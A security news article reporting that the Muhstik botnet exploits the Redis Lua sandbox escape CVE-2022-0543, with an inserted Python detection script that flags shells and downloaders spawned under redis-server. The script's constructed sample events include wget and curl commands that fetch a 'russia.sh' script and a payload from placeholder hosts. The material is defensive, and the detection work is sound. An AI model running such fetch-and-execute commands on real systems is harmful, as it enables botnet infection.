The Cyber Security News

Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability

March 28, 2022

Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.

The vulnerability relates to CVE-2022-0543, a Lua sandbox escape flaw in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.


“Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,” Ubuntu noted in an advisory released last month.

According to telemetry data gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (“russia.sh”) from a remote server, which is then used to fetch and execute the botnet binaries from another server.
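A detection example for the chain described above, added here and not taken from the Juniper Threat Labs report or from this article: it flags shells and downloaders whose process lineage traces back to redis-server, so later stages of the chain are caught as well as the first child. The event format, host name, PIDs and addresses are constructed for illustration; only the script name "russia.sh" comes from the article.

```python
import json

# Constructed process-creation events (JSON lines), shaped like EDR/auditd exec
# telemetry. Host, PIDs and the 192.0.2.x / 198.51.100.x addresses are made up.
SAMPLE_EVENTS = """\
{"host":"db1","pid":900,"ppid":1,"comm":"redis-server","cmdline":"/usr/bin/redis-server 0.0.0.0:6379"}
{"host":"db1","pid":4000,"ppid":900,"comm":"redis-rdb-bgsave","cmdline":"redis-rdb-bgsave 0.0.0.0:6379"}
{"host":"db1","pid":4101,"ppid":900,"comm":"sh","cmdline":"sh -c wget -q -O /tmp/russia.sh http://192.0.2.10/russia.sh"}
{"host":"db1","pid":4102,"ppid":4101,"comm":"wget","cmdline":"wget -q -O /tmp/russia.sh http://192.0.2.10/russia.sh"}
{"host":"db1","pid":4103,"ppid":4101,"comm":"sh","cmdline":"sh"}
{"host":"db1","pid":4110,"ppid":4103,"comm":"curl","cmdline":"curl -s -O http://198.51.100.7/payload"}
{"host":"db1","pid":5000,"ppid":1,"comm":"sshd","cmdline":"/usr/sbin/sshd -D"}
{"host":"db1","pid":5001,"ppid":5000,"comm":"bash","cmdline":"-bash"}
{"host":"db1","pid":5002,"ppid":5001,"comm":"curl","cmdline":"curl -s https://example.com/health"}
"""

SUSPECT = {"sh", "bash", "dash", "curl", "wget"}  # shells and downloaders
KNOWN_SCRIPT = "russia.sh"                        # script name reported in the article

def redis_descendant_alerts(lines):
    """Return (pid, comm, severity) for suspect processes descended from redis-server."""
    procs, alerts = {}, []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        procs[(ev["host"], ev["pid"])] = ev  # assumes no PID reuse within the window
        if ev["comm"] not in SUSPECT:
            continue  # Redis's own save children (e.g. redis-rdb-bgsave) land here
        parent = procs.get((ev["host"], ev["ppid"]))
        hops = 0
        while parent and hops < 32:  # bounded walk up the lineage
            if parent["comm"] == "redis-server":
                sev = "critical" if KNOWN_SCRIPT in ev["cmdline"] else "high"
                alerts.append((ev["pid"], ev["comm"], sev))
                break
            parent = procs.get((ev["host"], parent["ppid"]))
            hops += 1
    return alerts

if __name__ == "__main__":
    for alert in redis_descendant_alerts(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

The interactive curl run under sshd is not flagged, because its lineage never reaches redis-server.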


First documented by Chinese security firm Netlab 360, Muhstik is known to be active since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.

Capable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and Tomato routers, Muhstik has been spotted weaponizing a number of flaws over the years:

  • CVE-2017-10271 (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware
  • CVE-2018-7600 (CVSS score: 9.8) – Drupal remote code execution vulnerability
  • CVE-2019-2725 (CVSS score: 9.8) – Oracle WebLogic Server remote code execution vulnerability
  • CVE-2021-26084 (CVSS score: 9.8) – An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and
  • CVE-2021-44228 (CVSS score: 10.0) – Apache Log4j remote code execution vulnerability (aka Log4Shell)

“This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,” Juniper Threat Labs researchers said in a report published last week.

In light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.



Some sections of this report are sourced from:
thehackernews.com
